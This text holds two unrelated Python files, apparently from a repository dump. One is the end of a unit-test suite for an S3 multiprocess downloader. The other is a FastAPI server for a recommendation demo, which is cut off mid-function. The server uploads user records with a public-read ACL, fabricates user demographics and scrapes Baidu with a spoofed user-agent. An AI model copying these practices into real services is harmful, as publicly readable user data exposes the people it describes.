bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'VersionId': 'versionid'},
filename=self.filename,
)
])
def test_run_with_exception(self):
self.stubber.add_client_error('head_object', 'NoSuchKey', 404)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError)
def test_run_with_error_in_allocating_temp_file(self):
self.osutil.allocate.side_effect = OSError()
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), OSError)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_submitter_cannot_be_killed(self):
self.add_download_file_request(expected_size=None)
self.add_shutdown()
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.head_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.submitter.run()
except KeyboardInterrupt:
self.fail(
'The submitter should have not been killed by the '
'KeyboardInterrupt'
)
class TestGetObjectWorker(StubbedClientTest):
def setUp(self):
super(TestGetObjectWorker, self).setUp()
self.files = FileCreator()
self.queue = queue.Queue()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = OSUtils()
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.remote_contents = b'my content'
self.temp_filename = self.files.create_file('tempfile', '')
self.extra_args = {}
self.offset = 0
self.final_filename = self.files.full_path('final_filename')
self.stream = six.BytesIO(self.remote_contents)
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000)
def tearDown(self):
super(TestGetObjectWorker, self).tearDown()
self.files.remove_all()
def add_get_object_job(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'temp_filename': self.temp_filename,
'extra_args': self.extra_args,
'offset': self.offset,
'filename': self.final_filename
}
kwargs.update(override_kwargs)
self.queue.put(GetObjectJob(**kwargs))
def add_shutdown(self):
self.queue.put(SHUTDOWN_SIGNAL)
def add_stubbed_get_object_response(self, body=None, expected_params=None):
if body is None:
body = self.stream
get_object_response = {'Body': body}
if expected_params is None:
expected_params = {
'Bucket': self.bucket,
'Key': self.key
}
self.stubber.add_response(
'get_object', get_object_response, expected_params)
def assert_contents(self, filename, contents):
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(f.read(), contents)
def assert_does_not_exist(self, filename):
self.assertFalse(os.path.exists(filename))
def test_run_is_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_contents(self.final_filename, self.remote_contents)
def test_run_jobs_is_not_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
self.assert_does_not_exist(self.final_filename)
def test_run_with_extra_args(self):
self.add_get_object_job(extra_args={'VersionId': 'versionid'})
self.add_shutdown()
self.add_stubbed_get_object_response(
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid'
}
)
self.worker.run()
self.stubber.assert_no_pending_responses()
def test_run_with_offset(self):
offset = 1
self.add_get_object_job(offset=offset)
self.add_shutdown()
self.add_stubbed_get_object_response()
self.worker.run()
with open(self.temp_filename, 'rb') as f:
f.seek(offset)
self.assertEqual(f.read(), self.remote_contents)
def test_run_error_in_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.stubber.add_client_error('get_object', 'NoSuchKey', 404)
self.add_stubbed_get_object_response()
self.worker.run()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError)
def test_run_does_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')))
self.add_stubbed_get_object_response()
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
def test_run_can_exhaust_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
# 5 is the current setting for max number of GetObject attempts
for _ in range(5):
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')))
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id),
RetriesExceededError
)
def test_run_skips_get_object_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.worker.run()
# Note we did not add a stubbed response for get_object
self.stubber.assert_no_pending_responses()
def test_run_final_job_removes_file_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
def test_run_fails_to_rename_file(self):
exception = OSError()
osutil = RenameFailingOSUtils(exception)
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=osutil
)
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.assertEqual(
self.transfer_monitor.get_exception(self.transfer_id), exception)
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_worker_cannot_be_killed(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.get_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.worker.run()
except KeyboardInterrupt:
self.fail(
'The worker should have not been killed by the '
'KeyboardInterrupt'
)
|
server.py
|
import json
import logging
import os
import uuid
from typing import List
import sys
import cache
import math
import base64
from random import randint
from multiprocessing import Process, Pool
from threading import Thread
import boto3
import botocore
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException, APIRouter, Depends
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
import random
import calendar
import time
from bs4 import BeautifulSoup
from functools import partial, total_ordering
from requests import ConnectTimeout
from typing import Optional
from fastapi.responses import JSONResponse
class LoginRequest(BaseModel):
userId: str
userName: Optional[str] = None
class TrainRequest(BaseModel):
change_type: str
class URLRequest(BaseModel):
title: str
class ClickRequest(BaseModel):
userId: str
itemId: str
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
MANDATORY_ENV_VARS = {
'DEMO_PORT': 5900,
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'EVENT_SERVICE_ENDPOINT': 'http://event:5100',
'RETRIEVE_SERVICE_ENDPOINT': 'http://retrieve:5600',
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'AWS_REGION': 'ap-southeast-1',
'CLICK_RECORD_BUCKET': 'gcr-rs-ops-ap-southeast-1-522244679887',
'CLICK_RECORD_FILE_PATH': 'system/ingest-data/action/',
'USER_RECORD_FILE_PATH': 'system/ingest-data/user/',
'TEST': ''
}
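# Illustrative sketch (assumption, not shown in this excerpt): services in this
# project normally let real environment variables override the defaults above.
# _resolve_env_defaults is a hypothetical helper that documents that pattern.
def _resolve_env_defaults(defaults):
    # return a copy where any variable present in the real environment wins
    return {k: os.environ.get(k, str(v)) for k, v in defaults.items()}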
REDIS_KEY_USER_ID_CLICK_DICT = 'user_id_click_dict'
REDIS_KEY_USER_LOGIN_DICT = 'user_login_dict'
TRIGGER_RECALL_WINDOW = 3
news_records_dict = 'news_records_dict'
movie_records_dict = 'movie_records_dict'
user_id_action_dict = 'user_id_action_dict'
lNewsCfgCompleteType = ['news_story', 'news_culture', 'news_entertainment', 'news_sports', 'news_finance', 'news_house',
'news_car', 'news_edu', 'news_tech', 'news_military', 'news_travel', 'news_world', 'news_agriculture', 'news_game']
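# xasync runs the decorated function in a fire-and-forget daemon thread so the
# HTTP handlers can return immediately; e.g. init_news_records_data below is
# kicked off in the background when /api/v1/demo/notice is called.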
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@app.get('/api/v1/demo/dashboard', tags=["demo"])
def get_dashboard_data():
logging.info('Start demo->get_dashboard_data()...')
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_name = 'system/dashboard/dashboard.json'
file_key = os.path.join(s3_prefix, file_name)
s3 = boto3.resource('s3')
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
json_data = json.loads(object_str)
return response_success(json_data)
# notice demo service to load news record data
@app.post('/api/v1/demo/notice', tags=["demo"])
def notice(loadRequest: LoadRequest):
logging.info('Start demo->notice()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'news_records':
for file in file_list:
init_news_records_data(file_type, file_path, file, news_records_dict)
elif file_type == 'movie_records':
for file in file_list:
init_movie_records_data(file_type, file_path, file, movie_records_dict)
return {'result': 'success'}
@app.post('/api/v1/demo/login', tags=["demo"])
def login(loginRequest: LoginRequest):
logging.info('Start demo->login()...')
user_id = loginRequest.userId
user_name = loginRequest.userName
if user_name is None:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append('anonymous')
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
return response_success({
"message": "Login as anonymous user!",
"data": {
"userId": user_id,
"visitCount": 1
}
})
user_id_in_sever = get_user_id_by_name(user_name)
logging.info(
'login_post() - user_id_in_sever: {}'.format(user_id_in_sever))
if not user_id_in_sever:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append(user_name)
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
login_new_user(user_name, user_id)
user_id_in_sever = user_id
visit_count = increase_visit_count(user_name)
response = {
"message": "Login success",
"data": {
"userId": user_id_in_sever,
"visitCount": visit_count
}
}
return response_success(response)
def get_random_sex():
random_sex_list = ['M', 'F']
return random_sex_list[random.randint(0, len(random_sex_list) - 1)]
def get_random_age():
return str(random.randint(15, 60))
@app.get('/api/v1/demo/news', tags=["demo"])
def get_recommend_news(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_news()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend news list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
news_recommend_list = httpResp.json()['content']
logging.info('news_recommend_list {}'.format(news_recommend_list))
refresh_user_click_data(user_id, news_recommend_list, '1', recommend_type, 'news')
retrieve_response = generate_news_retrieve_response(news_recommend_list)
return retrieve_response
# get user history of click
@app.get('/api/v1/demo/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'news')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.get('/api/v1/demo/movie/click/{user_id}', tags=["demo"])
def movie_click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'movie')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.post('/api/v1/demo/click', tags=["demo"])
def click_post(clickRequest: ClickRequest):
logging.info("click_post enter")
user_id = clickRequest.userId
item_id = clickRequest.itemId
logging.info("user_id:{}, item_id:{}".format(user_id, item_id))
user_click_count = add_user_click_info(user_id, item_id)
click_one_to_portrait(user_id, item_id)
click_hist_to_recall(user_id, item_id, user_click_count)
return response_success({
"message": "clicked item_id: {}".format(item_id)
})
@app.get('/api/v1/demo/portrait/userid/{user_id}', tags=["demo"])
def portrait_get(user_id: str):
logging.info("portrait_get enter")
logging.info('user_id -> %s', user_id)
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/portrait/'+user_id)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
portrait_data = httpResp.json()['content']
logging.info('portrait_data {}'.format(portrait_data))
return {"message": "success",
"data": portrait_data}
@app.post('/api/v1/demo/url', tags=["demo"])
def url_get(urlRequest: URLRequest):
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',
'Host': 'www.baidu.com',
'upgrade-insecure-requests': '0',
'sec-fetch-dest': 'document',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,'
'application/signed-exchange;v=b3;q=0.9 '
}
title_b64 = urlRequest.title
decoded_bytes = base64.b64decode(title_b64)
title_str = str(decoded_bytes, "utf-8")
logging.info("search: {}".format(title_str))
try:
url = search_by_title(title_str, headers, 10)
except Exception as e1:
logging.error(repr(e1))
url = ''
random_url_list = [
'https://baijiahao.baidu.com/s?id=1690715424093912615&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690666081179071313&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690723015618951721&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690633677458149226&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690664720265254989&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690665452297691041&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10036081365139924887%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9821107029074050546%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9264994315553468968%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10001786768465709073%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9475883012444359813%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9862364227218649344%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9664070672349907696%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9039212282786529445%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9192155174958843101%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9793602629771651632%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9725620345608597043%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9939917266435866080%22%7D'
'&n_type=0&p_from=1'
]
logging.info(f"url: {url}")
if not url:
logging.warning("give a random url")
url = random_url_list[random.randint(0, len(random_url_list) - 1)]
return response_success({
"url": url
})
def search_by_title(title, headers, timeout):
url = "http://www.baidu.com/s"
if len(title) > 32:
title = title[: 32]
logging.info("search_by_title:'{}'".format(title))
params = {"wd": title, "cl": 3, "ie": "utf-8"}
try:
try_count = 0
while try_count < 10:
res = requests.get(url, params=params, headers=headers,
timeout=timeout, allow_redirects=True)
logging.info("res.status_code: {}, try_count:{}, res.text size: {}".format(res.status_code, try_count,
len(res.text)))
soup = BeautifulSoup(res.text, 'html.parser')
try_count = try_count + 1
if is_success_code(res.status_code) and len(soup.text.strip()) > 0:
break
logging.info("now sleep 1 sec ...")
time.sleep(1)
except ConnectTimeout as e:
logging.error(repr(e))
logging.error("request to '{}' timeout".format(url))
return ''
if not is_success_code(res.status_code):
logging.error(
"request fail to www.baidu.com, status_code:{}".format(res.status_code))
return ''
content_left = soup.select("#content_left")
if not content_left:
logging.info("抱歉没有找到 ...")
logging.info("res.text:{}".format(res.text.strip()))
return ""
logging.info("content_left div size={}".format(len(content_left)))
url = ''
try:
content_left_div = content_left[0]
all_links = content_left_div.find_all('a')
url = find_first_link(all_links)
except Exception as e:
logging.error("title:{}".format(title))
logging.error(repr(e))
return url
def find_first_link(the_links):
for link in the_links:
if 'href' in link.attrs:
href = link.attrs['href']
if href.startswith('http://www.baidu.com/link?url='):
return href
def is_success_code(status_code):
return status_code in [200, 201, 202, 203, 204, 205, 206, 209, 210]
def mock_item_detail():
item_detail_data = {
"id": "6552368441838272771",
"title": "Title for mock",
"url": "www.baidu.com"
}
return response_success({
"message": "mock news detail for news_id: {}".format("6552368441838272771"),
"data": item_detail_data
})
@xasync
def init_news_records_data(type, path, file, key):
logging.info('start init_records_data')
p = Pool(1)
new_callback = partial(load_news_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
@xasync
def init_movie_records_data(type, path, file, key):
logging.info('start init_movie_records_data')
p = Pool(1)
new_callback = partial(load_movie_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
def load_news_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'code': array[1],
'type': array[2],
'title': array[3],
'keywords': array[4],
'url': '-'
}).encode('utf-8'))
file_to_load.close()
logging.info('Load news records ... was successful.')
def load_movie_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'program_type': array[1],
'program_name': array[2],
'release_year': array[3],
'director': array[4],
'actor': array[5],
'category_property': array[6],
'language': array[7],
'ticket_num': array[8],
'score': array[9],
'level': array[10],
'new_series': array[11]
}).encode('utf-8'))
file_to_load.close()
logging.info('Load movie records ... was successful.')
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
def click_one_to_portrait(user_id, news_id):
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/portrait/'+user_id
send_post_request(url, {
'clicked_item': {
'id': news_id
}
})
def click_hist_to_recall(user_id, news_id, user_click_count):
if user_click_count > 0 and user_click_count % TRIGGER_RECALL_WINDOW == 0:
trigger_recall_svc(user_id)
def trigger_recall_svc(user_id):
window = TRIGGER_RECALL_WINDOW
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/recall/'+user_id
click_list = get_user_click_hist(user_id, window)
return send_post_request(url, {
'user_id': user_id,
'clicked_item_list': click_list
})
def get_user_click_hist(user_id, top_n):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('get user_click_hist {}'.format(redis_click_list))
news_id_list = [item for item in redis_click_list]
news_id_list.reverse()
result = []
for var in news_id_list[0:top_n]:
result.append({"id": var})
return result
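# Illustrative sketch (ids are hypothetical): with top_n=2 and a stored click history of
# ["id-a", "id-b", "id-c"], the most recent clicks come first, so the function returns
#   [{"id": "id-c"}, {"id": "id-b"}]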
def send_post_request(url, data):
logging.info("send POST request to {}".format(url))
logging.info("data: {}".format(data))
if MANDATORY_ENV_VARS['TEST'] == 'True':
return "Test Mode - ok"
headers = {'Content-type': 'application/json'}
r = requests.post(url, data=json.dumps(data), headers=headers)
logging.info("status_code: {}".format(r.status_code))
if r.status_code == 200:
return r.json()
else:
logging.error(r.text)
raise Exception(
"status_code: {}, error POST request {}".format(r.status_code, url))
def add_user_click_info(user_id, news_id):
logging.info("add_user_click_info, user_id: " +
user_id + ", news_id:" + news_id)
click_list = get_list_from_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id)
click_list.append(news_id)
set_value_to_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id, click_list)
logging.info("done set click_list to {} for {}, list size: {}".format(
REDIS_KEY_USER_ID_CLICK_DICT, user_id, len(click_list)))
update_item_click_action(user_id, news_id)
return len(click_list)
def get_list_from_redis(dict_name, key):
logging.info("get lsit {}[{}] from redis".format(dict_name, key))
list_bin = rCache.get_data_from_hash(dict_name, key)
if list_bin:
list_values = json.loads(binary_to_str(list_bin))
else:
list_values = []
logging.info("return {} items".format(len(list_values)))
return list_values
def update_item_click_action(user_id, news_id):
'''
field -> user_id_action_dict
key -> user_id
value -> [
{
news_id : 0
},
{
news_id : 1
}
]
'''
logging.info("update_item_click_action {}[{}] '{}' = 1".format(
user_id_action_dict, user_id, news_id))
user_action = get_list_from_redis(user_id_action_dict, user_id)
click_data = user_action['click_data']
existed_id_flag = 0
for item in click_data:
if news_id in item:
item[str(news_id)] = "1"
existed_id_flag = 1
break
if existed_id_flag == 0:
user_action['click_data'].append({news_id: '1'})
logging.info('after user_action update: {}'.format(user_action))
set_value_to_redis(user_id_action_dict, user_id, user_action)
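# Illustrative sketch (values are hypothetical) of what user_id_action_dict holds for one user
# after the update above; the clicked item is flipped to '1', unclicked items stay '0':
#   {
#       "click_data": [{"6552368441838272771": "1"}, {"6552368441838272772": "0"}],
#       "action_source": "recommend"
#   }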
def get_user_click_list_info(user_id, page_size, cur_page, scenario):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('redis_click_list: {}'.format(redis_click_list))
item_id_list_all = redis_click_list
item_id_list_all.reverse()
total_items = len(item_id_list_all)
total_page = math.ceil(total_items / int(page_size))
from_index = int(page_size) * int(cur_page)
to_index = int(page_size) * (int(cur_page) + 1)
page_item_id = item_id_list_all[from_index:to_index]
click_list = []
if scenario == 'news':
click_list = [get_item_by_id(news_id) for news_id in page_item_id]
elif scenario == 'movie':
click_list = [get_movie_by_id(movie_id) for movie_id in page_item_id]
else:
logging.info("scenario {} is not supported!")
logging.info(
"get_user_click_list_info return click_list size: {}".format(len(click_list)))
return {
"click_list": click_list,
"total_items": total_items,
"total_page": total_page
}
def get_item_by_id(item_id):
logging.info("get_item_by_id start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
item_id, news_detail_record))
return {
'id': item_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com' # TODO
}
def get_movie_by_id(item_id):
logging.info("get_movie_by_id start")
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, item_id), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(item_id, movie_detail_record))
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
return {
'id': item_id,
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, item_id),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(item_id),
'type': movie_detail_record['program_type']
}
def get_item_detail_response(news_id):
logging.info("get_item_detail_response start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, news_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
news_id, news_detail_record))
data = {
'id': news_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com'
}
return response_success({
"message": "news {} detail success".format(news_id),
"data": data
})
def generate_news_retrieve_response(new_recommend_list):
retrieve_data = []
for element in new_recommend_list:
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, element['id']), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
element['id'], news_detail_record))
data = {
'id': element['id'],
'image': 'https://inews.gtimg.com/newsapp_bt/0/13060844390/1000', # TODO
'title': news_detail_record['title'],
'desc': '{}'.format(element['id']), # TODO
'type': news_detail_record['type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(new_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_movie_retrieve_response(movie_recommend_list):
retrieve_data = []
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
for element in movie_recommend_list:
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, element['id']), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(
element['id'], movie_detail_record))
data = {
'id': element['id'],
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, element['id']),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(element['id']),
'type': movie_detail_record['program_type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(movie_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def refresh_user_click_data(user_id, items_recommend_list, action_type, action_source, scenario):
logging.info('refresh_user_click_data start')
store_previous_click_data(user_id, action_type, scenario)
new_click_data = generate_new_click_data(
items_recommend_list, action_source)
